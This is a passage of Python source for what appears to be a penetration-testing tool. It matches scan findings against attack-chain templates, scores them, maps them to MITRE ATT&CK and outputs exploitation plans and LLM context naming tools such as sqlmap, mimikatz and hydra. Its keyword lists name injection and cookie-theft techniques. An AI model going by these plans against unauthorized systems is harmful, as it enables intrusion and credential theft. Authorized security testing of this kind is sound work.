    def __post_init__(self):
        if not self.risk_score:
            self.risk_score = self._calculate_risk_score()

    def _calculate_risk_score(self) -> float:
        """Calculate overall risk score 0-100."""
        # Base on impact
        impact_weights = {
            ChainImpact.CRITICAL: 40,
            ChainImpact.HIGH: 30,
            ChainImpact.MEDIUM: 20,
            ChainImpact.LOW: 10,
        }
        base_score = impact_weights.get(self.impact, 10)

        # Confidence multiplier
        confidence_mult = {
            ChainConfidence.CONFIRMED: 1.0,
            ChainConfidence.HIGH: 0.85,
            ChainConfidence.MEDIUM: 0.6,
            ChainConfidence.LOW: 0.3,
            ChainConfidence.THEORETICAL: 0.1,
        }
        mult = confidence_mult.get(self.confidence, 0.5)

        # Evidence from nodes
        avg_evidence = sum(n.evidence_strength for n in self.nodes) / len(self.nodes) if self.nodes else 0.5

        score = base_score * mult * (1 + avg_evidence)
        return min(100, max(0, score))

    def to_narrative(self) -> str:
        """Generate human-readable attack narrative."""
        lines = [f"## Attack Chain: {self.name}"]
        lines.append(f"**Risk Score:** {self.risk_score:.1f}/100")
        lines.append(f"**Confidence:** {self.confidence.value.title()}")
        lines.append(f"**Impact:** {self.impact.value.title()}")
        lines.append("")
        lines.append("### Attack Steps:")
        for i, node in enumerate(self.nodes, 1):
            lines.append(f"{i}. **{node.action}**")
            lines.append(f"   - Result: {node.result}")
            if node.technique:
                lines.append(f"   - MITRE: {node.technique.id} ({node.technique.name})")
        return "\n".join(lines)

    def to_compact(self) -> str:
        """Compact format for LLM context."""
        tactics = " → ".join(t.value for t in self.mitre_tactics)
        return f"[{self.impact.value[0].upper()}|{self.risk_score:.0f}] {self.name}: {tactics}"

    def to_dict(self) -> Dict[str, Any]:
        """Convert to dictionary."""
        return {
            "id": self.id,
            "name": self.name,
            "description": self.description,
            "risk_score": self.risk_score,
            "confidence": self.confidence.value,
            "impact": self.impact.value,
            "mitre_tactics": [t.value for t in self.mitre_tactics],
            "nodes": [
                {
                    "id": n.id,
                    "finding_id": n.finding_id,
                    "action": n.action,
                    "result": n.result,
                    "technique": n.technique.id if n.technique else None,
                    "evidence_strength": n.evidence_strength,
                }
                for n in self.nodes
            ],
            "target_assets": self.target_assets,
            "recommended_tools": self.recommended_tools,
        }


# ============================================================================
# Chain Patterns - Attack Path Templates
# ============================================================================

@dataclass
class ChainPattern:
    """
    A template for detecting attack chains.
    """
    id: str
    name: str
    description: str
    entry_types: Set[str]  # Finding types that can start this chain
    intermediate_types: Set[str]  # Types that can be in the middle
    exit_types: Set[str]  # Types that complete the chain
    tactics: List[MitreTactic]
    base_impact: ChainImpact
    keywords: Set[str]  # Keywords in findings that match this pattern


# Pre-defined attack chain patterns
CHAIN_PATTERNS = [
    ChainPattern(
        id="sqli_to_rce",
        name="SQL Injection to Remote Code Execution",
        description="Exploit SQL injection to achieve code execution on the database server",
        entry_types={"sqli", "vuln"},
        intermediate_types={"database", "credential"},
        exit_types={"rce", "shell"},
        tactics=[MitreTactic.INITIAL_ACCESS, MitreTactic.EXECUTION],
        base_impact=ChainImpact.CRITICAL,
        keywords={"sql", "injection", "database", "xp_cmdshell", "into outfile"},
    ),
    ChainPattern(
        id="sqli_data_breach",
        name="SQL Injection Data Breach",
        description="Exploit SQL injection to exfiltrate sensitive data",
        entry_types={"sqli", "vuln"},
        intermediate_types={"database"},
        exit_types={"data_exfil", "credential"},
        tactics=[MitreTactic.INITIAL_ACCESS, MitreTactic.COLLECTION, MitreTactic.EXFILTRATION],
        base_impact=ChainImpact.CRITICAL,
        keywords={"sql", "injection", "union", "select", "dump"},
    ),
    ChainPattern(
        id="xss_session_hijack",
        name="XSS to Session Hijacking",
        description="Use XSS to steal session cookies and impersonate users",
        entry_types={"xss", "vuln"},
        intermediate_types={"cookie", "session"},
        exit_types={"session_hijack", "account_takeover"},
        tactics=[MitreTactic.INITIAL_ACCESS, MitreTactic.CREDENTIAL_ACCESS],
        base_impact=ChainImpact.HIGH,
        keywords={"xss", "script", "cookie", "document.cookie", "reflected", "stored"},
    ),
    ChainPattern(
        id="ssrf_internal_pivot",
        name="SSRF Internal Network Pivot",
        description="Use SSRF to scan and attack internal network services",
        entry_types={"ssrf", "vuln"},
        intermediate_types={"port", "service"},
        exit_types={"internal_access", "lateral_move"},
        tactics=[MitreTactic.INITIAL_ACCESS, MitreTactic.DISCOVERY, MitreTactic.LATERAL_MOVEMENT],
        base_impact=ChainImpact.HIGH,
        keywords={"ssrf", "localhost", "127.0.0.1", "internal", "metadata"},
    ),
    ChainPattern(
        id="cred_reuse_lateral",
        name="Credential Reuse Lateral Movement",
        description="Use discovered credentials to access other systems",
        entry_types={"credential", "password"},
        intermediate_types={"ssh", "rdp", "smb"},
        exit_types={"lateral_move", "shell"},
        tactics=[MitreTactic.CREDENTIAL_ACCESS, MitreTactic.LATERAL_MOVEMENT],
        base_impact=ChainImpact.CRITICAL,
        keywords={"password", "credential", "username", "hash", "login"},
    ),
    ChainPattern(
        id="subdomain_takeover",
        name="Subdomain Takeover",
        description="Take over unclaimed subdomains pointing to external services",
        entry_types={"subdomain", "dns"},
        intermediate_types={"dangling", "cname"},
        exit_types={"takeover", "phishing"},
        tactics=[MitreTactic.RECONNAISSANCE, MitreTactic.INITIAL_ACCESS],
        base_impact=ChainImpact.MEDIUM,
        keywords={"subdomain", "cname", "dangling", "unclaimed", "takeover"},
    ),
    ChainPattern(
        id="lfi_to_rce",
        name="LFI to Remote Code Execution",
        description="Escalate Local File Inclusion to code execution",
        entry_types={"lfi", "vuln"},
        intermediate_types={"log", "session", "upload"},
        exit_types={"rce", "shell"},
        tactics=[MitreTactic.INITIAL_ACCESS, MitreTactic.EXECUTION],
        base_impact=ChainImpact.CRITICAL,
        keywords={"lfi", "local file", "include", "..%2f", "log poison"},
    ),
    ChainPattern(
        id="exposed_admin_rce",
        name="Exposed Admin Panel Exploitation",
        description="Access exposed admin panel and achieve code execution",
        entry_types={"admin", "panel", "path"},
        intermediate_types={"upload", "config"},
        exit_types={"rce", "shell"},
        tactics=[MitreTactic.INITIAL_ACCESS, MitreTactic.EXECUTION],
        base_impact=ChainImpact.HIGH,
        keywords={"admin", "panel", "dashboard", "upload", "webshell"},
    ),
    ChainPattern(
        id="weak_ssl_mitm",
        name="Weak SSL/TLS Man-in-the-Middle",
        description="Exploit weak SSL configuration for traffic interception",
        entry_types={"ssl", "tls", "vuln"},
        intermediate_types={"cipher", "protocol"},
        exit_types={"mitm", "credential"},
        tactics=[MitreTactic.CREDENTIAL_ACCESS, MitreTactic.COLLECTION],
        base_impact=ChainImpact.MEDIUM,
        keywords={"ssl", "tls", "weak", "poodle", "beast", "heartbleed"},
    ),
    ChainPattern(
        id="service_exploit_privesc",
        name="Service Exploitation to Privilege Escalation",
        description="Exploit vulnerable service and escalate to root/admin",
        entry_types={"port", "service", "vuln"},
        intermediate_types={"shell", "access"},
        exit_types={"priv_esc", "root"},
        tactics=[MitreTactic.INITIAL_ACCESS, MitreTactic.EXECUTION, MitreTactic.PRIVILEGE_ESC],
        base_impact=ChainImpact.CRITICAL,
        keywords={"service", "exploit", "cve", "rce", "root", "privilege"},
    ),
]


# ============================================================================
# Chain Analysis Engine
# ============================================================================

class ChainAnalyzer:
    """
    Analyzes findings to detect attack chains and prioritize exploitation paths.

    The analyzer uses:
    1. Pattern matching against known attack chain templates (60+ patterns)
    2. Finding correlation based on targets and relationships
    3. Evidence strength calculation for confidence scoring
    4. MITRE ATT&CK technique mapping
    5. Extended patterns for modern attack vectors (SSRF, XXE, SSTI, Cloud, K8s)

    Example:
        analyzer = ChainAnalyzer()

        # Add findings from scan
        for finding in scan_results:
            analyzer.add_finding(finding)

        # Detect chains
        chains = analyzer.analyze()

        # Get prioritized exploitation plan
        plan = analyzer.get_exploitation_plan()

        # Export for AI analysis
        llm_context = analyzer.to_llm_context()

        # Use extended patterns for more comprehensive analysis
        analyzer_extended = ChainAnalyzer(use_extended_patterns=True)
    """

    def __init__(self, use_extended_patterns: bool = True):
        """
        Initialize the ChainAnalyzer.

        Args:
            use_extended_patterns: If True, include 50+ additional attack patterns
                covering OWASP Top 10, API Security, Cloud, Containers, and more.
        """
        self.findings: Dict[str, Any] = {}
        self.findings_by_type: Dict[str, List[str]] = defaultdict(list)
        self.findings_by_host: Dict[str, List[str]] = defaultdict(list)
        self.findings_by_severity: Dict[str, List[str]] = defaultdict(list)
        self.use_extended_patterns = use_extended_patterns

        # Load patterns - optionally include extended patterns
        if use_extended_patterns:
            try:
                from .attack_patterns import EXTENDED_CHAIN_PATTERNS, EXTENDED_TECHNIQUE_MAP, ATTACK_TOOL_RECOMMENDATIONS
                self.patterns = CHAIN_PATTERNS + EXTENDED_CHAIN_PATTERNS
                self._extended_techniques = EXTENDED_TECHNIQUE_MAP
                self._extended_tools = ATTACK_TOOL_RECOMMENDATIONS
                logger.info(f"Loaded {len(self.patterns)} attack chain patterns (including extended)")
            except ImportError:
                logger.warning("Extended patterns not available, using base patterns only")
                self.patterns = CHAIN_PATTERNS
                self._extended_techniques = {}
                self._extended_tools = {}
        else:
            self.patterns = CHAIN_PATTERNS
            self._extended_techniques = {}
            self._extended_tools = {}

        self.detected_chains: List[AttackChain] = []

    def add_finding(self, finding: Any) -> None:
        """
        Add a finding for chain analysis.

        Args:
            finding: A finding object with id, type, value, severity, metadata
        """
        fid = getattr(finding, "id", str(id(finding)))
        self.findings[fid] = finding

        # Index by type
        ftype = getattr(finding, "type", "unknown").lower()
        self.findings_by_type[ftype].append(fid)

        # Index by host
        host = getattr(finding, "host", None) or finding.metadata.get("host", "")
        if host:
            self.findings_by_host[host].append(fid)

        # Index by severity
        severity = getattr(finding, "severity", "info")
        if hasattr(severity, "value"):
            severity = severity.value
        self.findings_by_severity[severity.lower()].append(fid)

    def add_findings(self, findings: List[Any]) -> None:
        """Add multiple findings."""
        for finding in findings:
            self.add_finding(finding)

    def analyze(self) -> List[AttackChain]:
        """
        Perform chain analysis on all findings.

        Returns:
            List of detected attack chains, sorted by risk score
        """
        self.detected_chains = []

        # Pattern-based detection
        for pattern in self.patterns:
            chains = self._match_pattern(pattern)
            self.detected_chains.extend(chains)

        # Cross-host correlation
        cross_host_chains = self._analyze_cross_host()
        self.detected_chains.extend(cross_host_chains)

        # Vulnerability chaining
        vuln_chains = self._chain_vulnerabilities()
        self.detected_chains.extend(vuln_chains)

        # Deduplicate and sort by risk
        self._deduplicate_chains()
        self.detected_chains.sort(key=lambda c: -c.risk_score)

        logger.info(f"Detected {len(self.detected_chains)} attack chains")
        return self.detected_chains

    def _match_pattern(self, pattern: ChainPattern) -> List[AttackChain]:
        """Match a specific attack pattern against findings."""
        chains = []

        # Find entry point findings
        entry_findings = []
        for ftype in pattern.entry_types:
            entry_findings.extend(self.findings_by_type.get(ftype, []))

        # Also check by keyword
        for fid, finding in self.findings.items():
            value = getattr(finding, "value", "").lower()
            desc = getattr(finding, "description", "").lower()
            if any(kw in value or kw in desc for kw in pattern.keywords):
                if fid not in entry_findings:
                    entry_findings.append(fid)

        if not entry_findings:
            return chains

        # For each entry point, build potential chain
        for entry_id in entry_findings:
            entry = self.findings[entry_id]

            # Calculate evidence strength
            evidence = self._calculate_evidence(entry, pattern)

            if evidence < 0.2:
                continue

            # Determine confidence
            if evidence >= 0.8:
                confidence = ChainConfidence.HIGH
            elif evidence >= 0.5:
                confidence = ChainConfidence.MEDIUM
            else:
                confidence = ChainConfidence.LOW

            # Build chain nodes
            nodes = [
                ChainNode(
                    id=f"node_{pattern.id}_1",
                    finding_id=entry_id,
                    technique=self._get_technique(pattern.id),
                    action=f"Exploit {getattr(entry, 'type', 'vulnerability')}",
                    result=f"Initial access via {getattr(entry, 'value', 'unknown')[:50]}",
                    evidence_strength=evidence,
                )
            ]

            # Add intermediate nodes based on related findings
            related = self._find_related_findings(entry_id, pattern.intermediate_types)
            for i, rel_id in enumerate(related[:2]):
                rel = self.findings[rel_id]
                nodes.append(ChainNode(
                    id=f"node_{pattern.id}_{i+2}",
                    finding_id=rel_id,
                    technique=None,
                    action=f"Leverage {getattr(rel, 'type', 'finding')}",
                    result=getattr(rel, 'value', '')[:50],
                    prerequisites=[nodes[-1].id],
                    evidence_strength=evidence * 0.8,
                ))

            # Add exit node
            nodes.append(ChainNode(
                id=f"node_{pattern.id}_exit",
                finding_id=entry_id,
                technique=self._get_technique_for_exit(pattern.exit_types),
                action=f"Achieve {list(pattern.exit_types)[0]}",
                result=pattern.description,
                prerequisites=[nodes[-1].id],
                evidence_strength=evidence * 0.7,
            ))

            # Create chain
            chain = AttackChain(
                id=f"chain_{pattern.id}_{entry_id[:8]}",
                name=pattern.name,
                description=f"{pattern.description} via {getattr(entry, 'value', 'unknown')[:30]}",
                nodes=nodes,
                confidence=confidence,
                impact=pattern.base_impact,
                mitre_tactics=pattern.tactics,
                target_assets=[getattr(entry, "host", "") or getattr(entry, "target", "")],
                recommended_tools=self._get_recommended_tools(pattern.id),
            )

            chains.append(chain)

        return chains

    def _calculate_evidence(self, finding: Any, pattern: ChainPattern) -> float:
        """Calculate evidence strength for a pattern match."""
        score = 0.0

        value = getattr(finding, "value", "").lower()
        desc = getattr(finding, "description", "").lower()

        # Keyword matches
        keyword_matches = sum(1 for kw in pattern.keywords if kw in value or kw in desc)
        score += min(0.4, keyword_matches * 0.1)

        # Severity bonus
        severity = getattr(finding, "severity", "info")
        if hasattr(severity, "value"):
            severity = severity.value
        severity_scores = {"critical": 0.3, "high": 0.2, "medium": 0.1, "low": 0.05}
        score += severity_scores.get(severity.lower(), 0)

        # CVE presence
        if hasattr(finding, "cve") and finding.cve:
            score += 0.2

        # Related findings bonus
        related = self._find_related_findings(
            getattr(finding, "id", str(id(finding))),
            pattern.intermediate_types
        )
        score += min(0.2, len(related) * 0.05)

        return min(1.0, score)

    def _find_related_findings(
        self,
        finding_id: str,
        types: Set[str],
    ) -> List[str]:
        """Find findings related by type or host."""
        related = []

        finding = self.findings.get(finding_id)
        if not finding:
            return related

        host = getattr(finding, "host", None) or finding.metadata.get("host", "")

        # Same host, different type
        for ftype in types:
            for fid in self.findings_by_type.get(ftype, []):
                if fid == finding_id:
                    continue
                other = self.findings[fid]
                other_host = getattr(other, "host", None) or other.metadata.get("host", "")
                if host and other_host == host:
                    related.append(fid)

        return related

    def _get_technique(self, pattern_id: str) -> Optional[MitreTechnique]:
        """Get MITRE technique for pattern."""
        # Base mapping for original patterns
        mapping = {
            "sqli_to_rce": "sqli",
            "sqli_data_breach": "sqli",
            "xss_session_hijack": "xss",
            "cred_reuse_lateral": "credential_dump",
            "service_exploit_privesc": "rce",
        }

        # Extended mapping for new patterns
        extended_mapping = {
            # SQLi variants
            "sqli_union_exfil": "sqli",
            "sqli_blind_boolean": "sqli",
            "sqli_time_based": "sqli",
            "sqli_stacked_rce": "sqli",
            "nosql_injection": "sqli",
            # Access Control
            "idor_horizontal": "idor",
            "idor_vertical": "idor",
            "bola_api": "idor",
            "bfla_api": "idor",
            "path_traversal_lfi": "path_traversal",
            "lfi_log_poison_rce": "path_traversal",
            "lfi_php_wrapper_rce": "path_traversal",
            # XSS
            "xss_stored_admin": "xss_stored",
            "xss_dom_based": "xss_reflected",
            "xss_to_csrf": "xss",
            "xss_keylogger": "xss_stored",
            # SSRF
            "ssrf_cloud_metadata": "ssrf",
            "ssrf_internal_scan": "ssrf",
            "ssrf_internal_exploit": "ssrf",
            "ssrf_file_read": "ssrf",
            # XXE
            "xxe_file_read": "xxe",
            "xxe_ssrf": "xxe",
            "xxe_blind_oob": "xxe",
            "xxe_rce": "xxe",
            # SSTI
            "ssti_jinja2_rce": "ssti",
            "ssti_twig_rce": "ssti",
            "ssti_freemarker_rce": "ssti",
            # Deserialization
            "java_deserial_rce": "deserialization",
            "php_deserial_rce": "deserialization",
            "python_pickle_rce": "deserialization",
            "dotnet_deserial_rce": "deserialization",
            # Auth
            "jwt_none_alg": "jwt_attack",
            "jwt_key_confusion": "jwt_attack",
            "jwt_secret_bruteforce": "jwt_attack",
            "oauth_redirect_theft": "oauth_flaw",
            "mfa_bypass_backup": "mfa_bypass",
            "password_reset_token": "brute_force",
            "session_fixation": "session_hijack",
            # API
            "graphql_introspection_enum": "graphql_introspection",
            "graphql_batching_dos": "dos",
            "api_mass_assignment": "idor",
            "api_rate_limit_bypass": "brute_force",
            # Cloud
            "aws_metadata_to_s3": "ssrf",
            "s3_bucket_takeover": "ssrf",
            "azure_metadata_to_keyvault": "ssrf",
            "gcp_metadata_to_storage": "ssrf",
            # Container/K8s
            "container_escape_privileged": "container_escape",
            "k8s_api_unauth": "container_discovery",
            "k8s_etcd_secret_dump": "credential_dump",
            "k8s_serviceaccount_abuse": "token_impersonation",
            # File Upload
            "file_upload_webshell": "file_upload",
            "file_upload_xxe": "xxe",
            "file_upload_polyglot": "file_upload",
            # Lateral Movement
            "kerberoasting_crack": "kerberoasting",
            "asreproast_crack": "asreproasting",
            "dcsync_ntds": "credential_dump",
            # PrivEsc
            "linux_sudo_privesc": "sudo_abuse",
            "linux_suid_privesc": "suid_abuse",
            "windows_token_impersonation": "token_impersonation",
            "windows_unquoted_service": "dll_hijack",
            # Command Injection
            "command_injection_rce": "command_injection",
            "ldap_injection": "sqli",
            "xpath_injection": "sqli",
        }

        key = mapping.get(pattern_id) or extended_mapping.get(pattern_id)

        # First check extended techniques, then fall back to base
        if key and hasattr(self, '_extended_techniques') and key in self._extended_techniques:
            return self._extended_techniques[key]
        return TECHNIQUE_MAP.get(key)

    def _get_technique_for_exit(self, exit_types: Set[str]) -> Optional[MitreTechnique]:
        """Get technique for exit type."""
        for exit_type in exit_types:
            if exit_type in TECHNIQUE_MAP:
                return TECHNIQUE_MAP[exit_type]
        return None

    def _get_recommended_tools(self, pattern_id: str) -> List[str]:
        """Get recommended tools for a pattern."""
        # Base tools for original patterns
        base_tools = {
            "sqli_to_rce": ["sqlmap", "burp"],
            "sqli_data_breach": ["sqlmap"],
            "xss_session_hijack": ["dalfox", "xsstrike"],
            "ssrf_internal_pivot": ["burp", "ffuf"],
            "cred_reuse_lateral": ["hydra", "crackmapexec"],
            "lfi_to_rce": ["burp", "ffuf"],
            "weak_ssl_mitm": ["testssl", "sslyze"],
            "service_exploit_privesc": ["metasploit", "searchsploit"],
        }

        # Extended tools for new patterns
        extended_tools = {
            # SQLi variants
            "sqli_union_exfil": ["sqlmap", "burp", "ghauri"],
            "sqli_blind_boolean": ["sqlmap", "burp"],
            "sqli_time_based": ["sqlmap", "burp"],
            "sqli_stacked_rce": ["sqlmap", "burp", "mssqlclient"],
            "nosql_injection": ["nosqlmap", "burp"],
            "ldap_injection": ["burp"],
            "xpath_injection": ["burp"],
            "command_injection_rce": ["commix", "burp"],
            # Access Control
            "idor_horizontal": ["burp", "autorize", "ffuf"],
            "idor_vertical": ["burp", "autorize"],
            "bola_api": ["burp", "autorize"],
            "bfla_api": ["burp"],
            "path_traversal_lfi": ["dotdotpwn", "burp", "ffuf"],
            "lfi_log_poison_rce": ["burp", "ffuf", "lfimap"],
            "lfi_php_wrapper_rce": ["burp", "lfimap"],
            # XSS
            "xss_stored_admin": ["dalfox", "xsstrike", "burp"],
            "xss_dom_based": ["dalfox", "burp"],
            "xss_to_csrf": ["burp", "xsstrike"],
            "xss_keylogger": ["beef", "burp"],
            # SSRF
            "ssrf_cloud_metadata": ["burp", "ssrfmap", "gopherus"],
            "ssrf_internal_scan": ["burp", "ffuf"],
            "ssrf_internal_exploit": ["burp", "ssrfmap", "gopherus"],
            "ssrf_file_read": ["burp", "ssrfmap"],
            # XXE
            "xxe_file_read": ["burp", "xxeinjector"],
            "xxe_ssrf": ["burp", "xxeinjector"],
            "xxe_blind_oob": ["burp", "xxeinjector", "oastify"],
            "xxe_rce": ["burp", "xxeinjector"],
            # SSTI
            "ssti_jinja2_rce": ["tplmap", "sstimap", "burp"],
            "ssti_twig_rce": ["tplmap", "burp"],
            "ssti_freemarker_rce": ["tplmap", "burp"],
            # Deserialization
            "java_deserial_rce": ["ysoserial", "burp", "jexboss"],
            "php_deserial_rce": ["phpggc", "burp"],
            "python_pickle_rce": ["burp"],
            "dotnet_deserial_rce": ["ysoserial.net", "burp"],
            # Auth
            "jwt_none_alg": ["jwt_tool", "burp"],
            "jwt_key_confusion": ["jwt_tool", "burp"],
            "jwt_secret_bruteforce": ["jwt_tool", "hashcat", "john"],
            "oauth_redirect_theft": ["burp"],
            "mfa_bypass_backup": ["burp"],
            "password_reset_token": ["burp", "ffuf"],
            "session_fixation": ["burp"],
            # API
            "graphql_introspection_enum": ["graphqlmap", "inql", "burp"],
            "graphql_batching_dos": ["graphqlmap", "burp"],
            "api_mass_assignment": ["burp", "postman"],
            "api_rate_limit_bypass": ["burp", "ffuf"],
            "api_version_exploit": ["burp", "ffuf"],
            # Cloud
            "aws_metadata_to_s3": ["pacu", "awscli", "cloudfox"],
            "s3_bucket_takeover": ["s3scanner", "bucket_finder"],
            "azure_metadata_to_keyvault": ["azurehound", "roadtools"],
            "gcp_metadata_to_storage": ["gcp_scanner"],
            # Container/K8s
            "container_escape_privileged": ["deepce", "cdkexec"],
            "k8s_api_unauth": ["kube-hunter", "kubectl"],
            "k8s_etcd_secret_dump": ["etcdctl"],
            "k8s_serviceaccount_abuse": ["kubectl", "kube-hunter"],
            # File Upload
            "file_upload_webshell": ["burp", "fuxploider"],
            "file_upload_xxe": ["burp", "xxeinjector"],
            "file_upload_polyglot": ["burp", "exiftool"],
            # Lateral Movement / AD
            "kerberoasting_crack": ["impacket", "rubeus", "hashcat"],
            "asreproast_crack": ["impacket", "rubeus", "hashcat"],
            "dcsync_ntds": ["mimikatz", "impacket"],
            # PrivEsc
            "linux_sudo_privesc": ["linpeas", "gtfobins"],
            "linux_suid_privesc": ["linpeas", "gtfobins"],
            "windows_token_impersonation": ["winpeas", "incognito", "potato"],
            "windows_unquoted_service": ["winpeas", "powerup"],
        }

        # Check base tools first, then extended
        if pattern_id in base_tools:
            return base_tools[pattern_id]
        if pattern_id in extended_tools:
            return extended_tools[pattern_id]

        # Try to get from extended tool recommendations by pattern type
        if hasattr(self, '_extended_tools'):
            for key in ["sqli", "xss", "ssrf", "xxe", "ssti", "jwt", "api", "container", "kubernetes"]:
                if key in pattern_id.lower():
                    return self._extended_tools.get(key, [])

        return ["burp", "manual"]

    def _analyze_cross_host(self) -> List[AttackChain]:
        """Analyze attack chains that span multiple hosts."""
        chains = []

        # Find credentials that could enable lateral movement
        cred_findings = self.findings_by_type.get("credential", [])
        port_findings = self.findings_by_type.get("port", [])

        if cred_findings and port_findings:
            # Look for SSH/RDP ports that could be accessed with found creds
            ssh_ports = [
                fid for fid in port_findings
                if self.findings[fid].metadata.get("port") in [22, 2222]
            ]
            rdp_ports = [
                fid for fid in port_findings
                if self.findings[fid].metadata.get("port") == 3389
            ]

            if ssh_ports:
                chains.append(self._build_lateral_chain(
                    cred_findings[0], ssh_ports[0], "SSH"
                ))

            if rdp_ports:
                chains.append(self._build_lateral_chain(
                    cred_findings[0], rdp_ports[0], "RDP"
                ))

        return chains

    def _build_lateral_chain(
        self,
        cred_id: str,
        port_id: str,
        service: str,
    ) -> AttackChain:
        """Build a lateral movement chain."""
        cred = self.findings[cred_id]
        port = self.findings[port_id]

        return AttackChain(
            id=f"chain_lateral_{service.lower()}_{cred_id[:8]}",
            name=f"Lateral Movement via {service}",
            description=f"Use discovered credentials for {service} access",
            nodes=[
                ChainNode(
                    id="node_cred",
                    finding_id=cred_id,
                    technique=TECHNIQUE_MAP.get("credential_dump"),
                    action="Obtain credentials",
                    result=f"Credentials: {getattr(cred, 'value', 'unknown')[:30]}",
                    evidence_strength=0.8,
                ),
                ChainNode(
                    id=f"node_{service.lower()}",
                    finding_id=port_id,
                    technique=TECHNIQUE_MAP.get(f"lateral_{service.lower()}"),
                    action=f"Connect via {service}",
                    result=f"Access to {port.metadata.get('host', 'target')}",
                    prerequisites=["node_cred"],
                    evidence_strength=0.6,
                ),
            ],
            confidence=ChainConfidence.MEDIUM,
            impact=ChainImpact.HIGH,
            mitre_tactics=[MitreTactic.CREDENTIAL_ACCESS, MitreTactic.LATERAL_MOVEMENT],
            target_assets=[port.metadata.get("host", "")],
            recommended_tools=["hydra", "crackmapexec", "sshpass"],
        )

    def _chain_vulnerabilities(self) -> List[AttackChain]:
        """Chain multiple vulnerabilities for maximum impact."""
        chains = []

        vulns = self.findings_by_type.get("vuln", [])
        critical_vulns = [
            fid for fid in vulns
            if self.findings[fid].severity in ["critical", "CRITICAL"]
            or (hasattr(self.findings[fid].severity, "value")
                and self.findings[fid].severity.value == "critical")
        ]

        # Chain critical vulns on same host
        by_host = defaultdict(list)
        for fid in critical_vulns:
            host = self.findings[fid].metadata.get("host", "unknown")
            by_host[host].append(fid)

        for host, fids in by_host.items():
            if len(fids) >= 2:
                chains.append(self._build_multi_vuln_chain(host, fids))

        return chains

    def _build_multi_vuln_chain(
        self,
        host: str,
        finding_ids: List[str],
    ) -> AttackChain:
        """Build chain from multiple vulnerabilities."""
        nodes = []
        for i, fid in enumerate(finding_ids[:4]):
            finding = self.findings[fid]
            nodes.append(ChainNode(
                id=f"node_vuln_{i}",
                finding_id=fid,
                technique=TECHNIQUE_MAP.get("rce"),
                action=f"Exploit {getattr(finding, 'type', 'vuln')}",
                result=getattr(finding, "value", "")[:50],
                prerequisites=[f"node_vuln_{i-1}"] if i > 0 else [],
                evidence_strength=0.9,
            ))

        return AttackChain(
            id=f"chain_multi_vuln_{host[:8]}",
            name=f"Multi-Vulnerability Exploitation ({host})",
            description=f"Chain {len(finding_ids)} critical vulnerabilities on {host}",
            nodes=nodes,
            confidence=ChainConfidence.HIGH,
            impact=ChainImpact.CRITICAL,
            mitre_tactics=[MitreTactic.INITIAL_ACCESS, MitreTactic.EXECUTION, MitreTactic.PRIVILEGE_ESC],
            target_assets=[host],
            recommended_tools=["metasploit", "burp"],
        )

    def _deduplicate_chains(self) -> None:
        """Remove duplicate chains."""
        seen = set()
        unique = []

        for chain in self.detected_chains:
            # Key based on name and primary finding
            key = f"{chain.name}_{chain.nodes[0].finding_id if chain.nodes else ''}"
            if key not in seen:
                seen.add(key)
                unique.append(chain)

        self.detected_chains = unique

    # =========================================================================
    # Output Methods
    # =========================================================================

    def get_exploitation_plan(self, max_chains: int = 5) -> Dict[str, Any]:
        """
        Generate a prioritized exploitation plan.

        Returns:
            Dictionary with prioritized attack chains and recommendations
        """
        if not self.detected_chains:
            self.analyze()

        top_chains = self.detected_chains[:max_chains]

        return {
            "target_count": len(set(
                asset for chain in top_chains for asset in chain.target_assets
            )),
            "total_chains": len(self.detected_chains),
            "prioritized_chains": [
                {
                    "priority": i + 1,
                    "name": chain.name,
                    "risk_score": chain.risk_score,
                    "confidence": chain.confidence.value,
                    "impact": chain.impact.value,
                    "steps": len(chain.nodes),
                    "recommended_tools": chain.recommended_tools,
                }
                for i, chain in enumerate(top_chains)
            ],
            "immediate_actions": [
                chain.nodes[0].action for chain in top_chains if chain.nodes
            ],
        }

    def to_llm_context(self, max_chains: int = 10, max_tokens: int = 2000) -> str:
        """
        Export analysis for LLM consumption.

        Args:
            max_chains: Maximum chains to include
            max_tokens: Approximate token budget

        Returns:
            Compact string for LLM context
        """
        if not self.detected_chains:
            self.analyze()

        lines = ["## Attack Chain Analysis"]
        lines.append(f"Total Chains: {len(self.detected_chains)}")
        lines.append("")

        # Summary by impact
        by_impact = defaultdict(list)
        for chain in self.detected_chains:
            by_impact[chain.impact.value].append(chain)

        lines.append("### By Impact")
        for impact in ["critical", "high", "medium", "low"]:
            count = len(by_impact.get(impact, []))
            if count:
                lines.append(f"- {impact.upper()}: {count}")

        lines.append("")
        lines.append("### Top Attack Chains")

        for chain in self.detected_chains[:max_chains]:
            lines.append(f"\n{chain.to_compact()}")
            lines.append(f"  Tactics: {' → '.join(t.value for t in chain.mitre_tactics)}")
            if chain.recommended_tools:
                lines.append(f"  Tools: {', '.join(chain.recommended_tools)}")

        result = "\n".join(lines)

        # Truncate if needed
        if len(result) > max_tokens * 4:  # Rough char to token estimate
            result = result[:max_tokens * 4] + "\n... (truncated)"

        return result

    def to_json(self, indent: int = 2) -> str:
        """Export all chains to JSON."""
        if not self.detected_chains:
            self.analyze()

        return json.dumps({
            "analysis_summary": {
                "total_findings": len(self.findings),
                "total_chains": len(self.detected_chains),
                "by_impact": {
                    impact.value: len([c for c in self.detected_chains if c.impact == impact])
                    for impact in ChainImpact
                },
            },
            "chains": [chain.to_dict() for chain in self.detected_chains],
        }, indent=indent, default=str)


# ============================================================================
# Convenience Functions
# ============================================================================

def analyze_findings(findings: List[Any]) -> List[AttackChain]:
    """
    Quick chain analysis on a list of findings.

    Args:
        findings: List of finding objects

    Returns:
        List of detected attack chains
    """
    analyzer = ChainAnalyzer()
    analyzer.add_findings(findings)
    return analyzer.analyze()


def get_top_attack_paths(
    findings: List[Any],
    max_paths: int = 5,
) -> List[Dict[str, Any]]:
    """
    Get top attack paths from findings.

    Args:
        findings: List of finding objects
        max_paths: Maximum paths to return

    Returns:
        List of attack path dictionaries
    """
    chains = analyze_findings(findings)
    return [chain.to_dict() for chain in chains[:max_paths]]
